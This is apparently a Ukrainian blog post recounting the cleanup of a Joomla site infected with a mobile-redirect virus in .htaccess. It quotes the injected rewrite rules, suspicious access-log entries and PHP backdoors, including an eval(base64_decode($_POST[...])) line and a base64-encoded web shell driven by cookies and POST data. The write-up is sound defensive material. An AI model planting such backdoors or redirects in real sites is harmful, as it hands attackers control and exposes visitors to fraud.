1. Вірус в .htaccess - мобільний редирект
2. Як знайти і видалити вірус htaccess з сайту?
3. Сканер на віруси, виявлені на вашому сайті
4. Безкоштовний сканер вірусів AI-Bolit
5. Як міг з'явитися вірус на сайті?

Робив надавно сайт своїй подрузі. Використовував CMS Joomla (ну подобається вона мені), сайт вийшов непоганий, відвідуваності, звичайно, поки замало, ну да ладно. Так ось, все складалося чудово поки в один прекрасний момент мені не подзвонили і не сказали, що сайт в смартфоні не відкривається. Точніше відкривається, але не те, що там має бути, а спливає віконце і просить примусово оновити браузер. А так як браузер подруга недавно оновлювала з офіційного сайту, то запідозрила вона недобре.

Вірус в .htaccess - мобільний редирект

Подивився я файли того сайту і в .htaccess виявив наступне (Це всього лише невеликий уривок з .htaccess, код стояв на самому початку файлу):

RewriteEngine on
RewriteCond% {HTTP_USER_AGENT} acs [NC, OR] RewriteCond% {HTTP_USER_AGENT} alav [NC, OR] RewriteCond% {HTTP_USER_AGENT} alca [NC, OR] RewriteCond% {HTTP_USER_AGENT} amoi [NC, OR] RewriteCond% {HTTP_USER_AGENT} audi [NC, OR] RewriteCond% {HTTP_USER_AGENT} aste [NC, OR] RewriteCond% {HTTP_USER_AGENT} avan [NC, OR] RewriteCond% {HTTP_USER_AGENT} benq [NC, OR] RewriteCond% {HTTP_USER_AGENT} bird [NC, OR] RewriteCond % {HTTP_USER_AGENT} blac [NC, OR] RewriteCond% {HTTP_USER_AGENT} blaz [NC, OR] RewriteCond% {HTTP_USER_AGENT} brew [NC, OR] RewriteCond% {HTTP_USER_AGENT} cell [NC, OR] RewriteCond% {HTTP_USER_AGENT} cldc [ NC, OR] RewriteCond% {HTTP_USER_AGENT} cmd- [NC, OR] RewriteCond% {HTTP_USER_AGENT} eric [NC, OR] RewriteCond% {HTTP_USER_AGENT} hipt [NC, OR] RewriteCond% {HTTP_USER_AGENT} inno [NC, OR] RewriteCond % {HTTP_USER_AGENT} ipaq [NC, OR] RewriteCond% {HTTP_USER_AGENT} java [NC, OR] RewriteCond% {HTTP_USER_AGENT} jigs [NC, OR] RewriteCond% {HTTP_USER_AGENT} kddi [NC, OR] RewriteCond% {HTTP_USER_AGENT} keji [ NC, OR] RewriteCond % {HTTP_USER_AGENT} leno [NC, OR] RewriteCond% {HTTP_USER_AGENT} lg-c [NC, OR] RewriteCond% {HTTP_USER_AGENT} lg-d [NC, OR] RewriteCond% {HTTP_USER_AGENT} lg-g [NC, OR] RewriteCond % {HTTP_USER_AGENT} lge- [NC, OR] RewriteCond% {HTTP_USER_AGENT} maui [NC, OR] RewriteCond% {HTTP_USER_AGENT} maxo [NC, OR] RewriteCond% {HTTP_USER_AGENT} midp [NC, OR] RewriteCond% {HTTP_USER_AGENT} mits [NC, OR]

Що робив цей вірус .htaccess? Він перенаправляв всіх відвідувачів з мобільних телефонів на спеціальнию посадкову сторінку, на якій користувачам пропонувалося оновити браузер (це в моєму випадку, а взагалі там може бути все, що завгодно). Такий вірус не відразу помітиш, адже не завжди вебмастер заходить на свій сайт зі смартфонів, планшетів і т.д. А ось вашим користувачам таке, я думаю, взагалі не сподобається, і наступного разу вони можуть взагалі до вас не прийти.

Як знайти і видалити вірус htaccess з сайту?

Видалення всього непотрібного з .htaccess не допомогло, навіть якщо потім виставляти права 000. Хоча спочатку я думав, що це допоможе, але через день-два вірус знову давав про себе знати.

Довелося залізти в журнал логів. Там виявилося кілька сумнівних рядків, наприклад:

146.185.239.19 - - [30 / Jun / 2014: 07: 38: 13 -0400] "POST /modules/mod_araticlhess/headers.php HTTP / 1.1" 302 284 "-" "Python-urllib / 2.7" 178.74.246.201 - - [30 / Jun / 2014: 05: 08: 45 -0400] "POST /administrator/components/com_banners/web-infor.php HTTP / 1.1" 200 18028 "http: // ******** / administrator / components / com_banners / web-infor.php "" Mozilla / 5.0 (Windows NT 6.1; Trident / 4.0; en: 16.0) Gecko / 20100101 Firefox / 16.0 "

На перевірку виявилося, що модуля з назвою mod_araticlhess або файлу web-infor.php взагалі бути не повинно. Так що якщо ви знайшли у себе щось подібне, сміливо видаляйте, іноді вони можуть називатися mod_administrator, mod_msn. Йдеться про Joomla, так що шукайте всі ці фейковий модулі в папці ваш_сайт / modules. Перед будь-якими змінами на сайті не забувайте робити резервну копію!

Сканер на віруси, виявлені на вашому сайті

Все зроблене вище, звичайно, допомогло, але вірус був видалений в повному обсязі. Однак, на хостингу Webhost1 (пользуюь цим хостингом вже кілька років, і тільки хороші враження) є так званий "Сканнер на віруси". Так ось при підозрі, що на вашому сайті з'явилися віруси, стоїмо їм скористатися.

Для цього досить вибрати папку, яку треба просканувати і натиснути на кнопку

Ось що він вам видасть у відповідь:

Якщо на сайті немає вірусів і інших сумнівних файлів, то червоних написів не буде. Ну, а якщо ж червоні написи з'явилися, то доведеться вручну переглядати кожен підозрілий файл і видаляти звідти зайвий код. У моєму випадку в заражені файли додавалася така строчка:

<? Php eval (base64_decode ($ _ POST [ 'nf03c87']));?>

Або ж створювалися абсолютно сторонні файли, з приблизно таким змістом:

<? Php eval (base64_decode ( "IGlmICggaXNzZXQoICRfQ09PS0lF

Wydkd2MnXSkgKSB7IGVjaG8gJzxjd2QJyAuIGdldGN3ZCgpIC4gJz

wvY3dkPic7IH0gaWYgKCBpc3NldCAoICRfUE9TVFsncGU4MCddI

CkgKSB7IGV2YWwgKCBiYXNlNjRfZGVjb2RlICggJF9QT1NUWydwZ

TgwJ10gKSApOyByZXR1cm47IH0gIGlmICggaXNzZXQoICRfQ09P

S0lFWydwZTgwJ10pICkgeyBldmFsICggYmFzZTY0X2RlY29kZSAoIC

RfQ09PS0lFWydwZTgwJ10gKSApOyByZXR1cm47IH0g "));?>

<! - e318c732855cb5bd81b12ac251dbe9f6 ->

Після видалення всіх сумнівних файлів і видалення стороннього коду в корисних файлах, вірус на сайті більше не з'являвся.

Безкоштовний сканер вірусів AI-Bolit

Я ним не користувався, але багато хто радить. Ось що він вміє:

- Шукати віруси, шкідливі і хакерські скрипти на хостингу

- шелли по сигнатурам і гнучким паттернам, шелли на основі нескладної евристики - все те, що звичайні антивіруси і сканери знайти не можуть

- шукати редіректи в .htaccess на шкідливі сайти і багато іншого.

Як міг з'явитися вірус на сайті?

Швидше за все він завантажений або через уразливості в CMS або впроваджений в якесь розширення, яке було завантажено з недобросовісного сайту. До речі, я недавно писав статтю Трохи про безопасноcті Joomla , Можете почитати.

Бажаю Вам, щоб Ви не стикалися з такими проблемами, а якщо зіткнетеся, то знаєте, що треба робити. Сподіваюся, стаття була корисною))